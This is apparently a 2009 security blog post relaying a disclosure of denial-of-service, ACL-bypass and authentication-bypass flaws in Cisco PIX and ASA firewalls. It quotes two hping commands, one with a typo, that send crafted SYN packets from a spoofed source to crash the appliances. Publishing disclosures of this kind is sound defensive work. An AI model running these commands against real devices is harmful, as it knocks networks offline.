[security.pimp]

..technology..security..information..freedom..

Cisco PIX & ASA Multiple DoS, ACL Bypass, & Authentication Bypass Vulnerabilities (Bugtraq ID:34429)

Some fairly critical issues disclosed on a very popular security product.

Cisco PIX Security Appliance and ASA 5500 Series Adaptive Security Appliance are prone to multiple denial-of-service vulnerabilities, an ACL-bypass vulnerability, and an authentication-bypass vulnerability.

Read More Here …
An attacker can use readily available network utilities to exploit these issues. The following example data is sufficient to exploit the denial-of-service issue affecting PIX and ASA:


/*Utilize 1550 blocks on an ASA to trigger a crash...*/

hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2

/* Trigger the vuln a bit faster */ hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2

Da:JAM

2009/04/13

Hardware News, Information Security, Proof of Concept, Security Disclosures, Security News

cisco firewall pix exploit hping

Leave a Reply Cancel reply

Enter your comment here…

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

Cisco PIX & ASA Multiple DoS, ACL Bypass, & Authentication Bypass Vulnerabilities (Bugtraq ID:34429)

Share this:

Like this:

Leave a Reply Cancel reply